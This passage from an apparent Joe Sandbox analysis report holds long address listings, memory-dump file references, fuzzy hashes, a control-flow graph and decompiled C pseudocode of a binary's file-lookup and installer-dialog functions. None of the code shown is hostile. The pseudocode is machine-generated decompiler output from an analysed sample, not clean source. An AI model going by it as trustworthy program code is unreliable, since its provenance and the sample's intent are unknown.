                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed3
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x0040710a
                                                  0x0040710a
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406eac
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x004075e5
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00407601
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00000000
                                                  0x00406e1a
                                                  0x00406ea6
                                                  0x00406daf
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407137
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x00000000
                                                  0x004073c8
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00000000
                                                  0x0040753b
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x00000000
                                                  0x00407390
                                                  0x0040738e
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                  • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                  • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                  • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                  0x004069a9
                                                  0x004069b2
                                                  0x00000000
                                                  0x004069bf
                                                  0x004069b5
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(772EFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004069A9
                                                  • FindClose.KERNEL32(00000000), ref: 004069B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                  • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 147 4040f4-404101 SetWindowPos 144->147 148 404107-40410e 144->148 150 4042f1-4042f6 call 404610 145->150 151 4042b3-4042b6 145->151 173 40428f-404297 146->173 147->148 153 404110-40412a ShowWindow 148->153 154 404152-404158 148->154 160 4042fb-404316 150->160 156 4042b8-4042c3 call 401389 151->156 157 4042e9-4042eb 151->157 161 404130-404143 GetWindowLongW 153->161 162 40422b-404239 call 40462b 153->162 163 404171-404174 154->163 164 40415a-40416c DestroyWindow 154->164 156->157 176 4042c5-4042e4 SendMessageW 156->176 157->150 159 404591 157->159 171 404593-40459a 159->171 168 404318-40431a call 40140b 160->168 169 40431f-404325 160->169 161->162 170 404149-40414c ShowWindow 161->170 162->171 174 404176-404182 SetWindowLongW 163->174 175 404187-40418d 163->175 172 40456e-404574 164->172 168->169 180 40432b-404336 169->180 181 40454f-404568 DestroyWindow EndDialog 169->181 170->154 172->159 179 404576-40457c 172->179 173->145 174->171 175->162 182 404193-4041a2 GetDlgItem 175->182 176->171 179->159 185 40457e-404587 ShowWindow 179->185 180->181 186 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 180->186 181->172 183 4041c1-4041c4 182->183 184 4041a4-4041bb SendMessageW IsWindowEnabled 182->184 187 4041c6-4041c7 183->187 188 4041c9-4041cc 183->188 184->159 184->183 185->159 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 186->213 214 40438b-404390 186->214 190 4041f7-4041fc call 40459d 187->190 191 4041da-4041df 188->191 192 4041ce-4041d4 188->192 190->162 194 404215-404225 SendMessageW 191->194 196 4041e1-4041e7 191->196 192->194 195 4041d6-4041d8 192->195 194->162 195->190 199 4041e9-4041ef call 40140b 196->199 200 4041fe-404207 call 40140b 196->200 211 4041f5 199->211 200->162 209 404209-404213 200->209 209->211 211->190 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->160 233 404464-404466 222->233 233->160 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->159 237 40447e-404484 235->237 236->172 238 4044a9-4044d6 CreateDialogParamW 236->238 237->160 239 40448a 237->239 238->172 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->159 240->159 245 404535-40454d ShowWindow call 404610 240->245 245->172
                                                  C-Code - Quality: 84%
                                                  			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                  0x004040d0
